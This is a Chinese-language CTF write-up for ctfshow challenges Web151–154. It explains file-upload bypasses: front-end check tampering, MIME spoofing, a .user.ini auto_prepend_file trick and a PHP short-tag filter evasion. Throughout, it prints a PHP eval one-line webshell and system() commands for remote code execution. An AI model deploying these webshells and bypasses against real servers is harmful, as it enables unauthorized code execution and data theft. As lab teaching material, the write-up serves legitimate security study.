ctfshow(151->154)--文件上传漏洞--.user.ini

Web151

进入界面:

审计:

提示是前台校验。

存在图片上传。

思路:

先编写一个一句话木马文件:

php 复制代码
//shell.php
<?php @eval($_POST[1]); ?>

既然是前端校验,我们查看页面源代码找到相关的校验内容:

说明只允许上传.png后缀的文件。

我们修改代码为允许上传.php文件:
然后上传一句话木马文件:

进入shell.php文件,POST传参1=system("ls ../");查看上一级目录,发现flag.php

php 复制代码
1=system("cat ../fla*");

得到flag.

Web152

进入界面:

审计:

在前端校验的基础上,增加了对请求头中Content-Type的验证。也称MIME验证。

思路:

先绕过前端验证。

可以和上一题一样修改前端代码,也可以将shell.php文件的后缀名修改为.png通过前端验证,然后抓包将文件的后缀名修改回去。也绕过了前端验证。

由于我们是以.png后缀上传的,所以Content-Type的值是image/png,符合服务端要求,文件成功上传。

执行系统命令:

php 复制代码
1=system("tac ../fl*");

得到flag.

Web153

进入页面:

审计:

前端验证+MIME验证+黑名单

思路:

上传.png后缀的木马,抓包修改回.php后缀:
发现文件不合规,说明后端对.php后缀名进行了过滤。

我们可以使用.user.ini文件,文件内容为:

php 复制代码
auto_prepend_file=shell.png

作用为:在访问主页文件时,会自动包含shell.png文件,将其文件内容当做php代码执行。

先将文件名修改为.user.ini.png,绕过前端验证,上传该文件,然后抓包修改:

然后用同样的方式绕过前端验证上传shell.png文件。

这时候我们在/upload处就可以实现RCE。也可以使用蚁剑连接:

找到flag.

Web154

进入界面:

审计:

前端验证+MIME验证+黑名单

思路:

上传.user.ini文件
上传shell.png文件
提示文件内容不合规。

php 复制代码
<?php @eval($_POST[1]);?> //文件内容

//怀疑是过滤了php,利用短标签绕过
<?= @eval($_POST[1]);?>

上传成功。蚁剑连接:

得到flag.

相关推荐
云计算练习生15 小时前
渗透测试行业术语扫盲(第十六篇)—— 红蓝对抗与演练类
网络·安全·网络安全·信息安全·渗透测试术语
KKKlucifer16 小时前
数据湖赋能 SIEM:下一代安全运营的技术融合与实践
安全
一三检测冯野1802129181316 小时前
医疗产品运输安全:ISTA 3A标准应用
安全·模拟运输测试·包装运输测试·包装振动测试·ista3a
小阿宁的猫猫16 小时前
sqlmap的使用
sql·网络安全·php
麻溜学习16 小时前
网工_安全等保与安全法规
安全
pengkai火火火17 小时前
基于springmvc拓展机制的高性能日志审计框架的设计与实现
spring boot·安全·微服务·架构
乐迪信息17 小时前
乐迪信息:AI摄像机识别煤矿出入井车辆数量异常检测
大数据·运维·人工智能·物联网·安全
百度安全17 小时前
百度办公网安全秘诀分享——兼顾安全与效率
安全·网络安全·dubbo·办公安全
acrelgxy18 小时前
实时预警,安全无忧|安科瑞AIM-D500-CA绝缘监测仪,为您的电气系统保驾护航!
安全·电能管理系统·电力监控系统·智能电力仪表
一三检测冯野1802129181318 小时前
振动下的安全防线:ASTM D999如何守护新能源电池运输命脉
安全·新能源电池·模拟运输测试·包装运输测试·包装振动测试